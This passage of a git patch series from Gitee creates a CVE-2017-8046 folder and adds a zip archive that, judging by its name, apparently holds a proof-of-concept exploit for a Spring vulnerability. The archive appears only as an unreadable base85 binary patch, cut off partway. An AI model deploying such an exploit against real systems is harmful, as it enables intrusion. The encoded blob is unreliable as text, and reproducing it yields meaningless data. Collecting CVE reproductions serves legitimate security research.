From 4746f6374b9a015b4f9221aeec7c56a033f676f8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:53:44 +0000
Subject: [PATCH 01/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202017?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/java-spring/2017/.keep

diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 474bbce43c3e49cdb7b3387dc7e6d18037f2f244 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:54:28 +0000
Subject: [PATCH 02/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2017-8046?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/java-spring/2017/CVE-2017-8046/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep

diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 7039547d3b23e13e89f9c2f7d0b448cbb246b615 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:56:14 +0000
Subject: [PATCH 03/13] add cve-2017-8046
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 .../spring-break_cve-2017-8046-master.zip       | Bin 0 -> 12833 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip

diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip
new file mode 100644
index 0000000000000000000000000000000000000000..078e924350cf580703b34d31477354a894198a3b
GIT binary patch
literal 12833
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
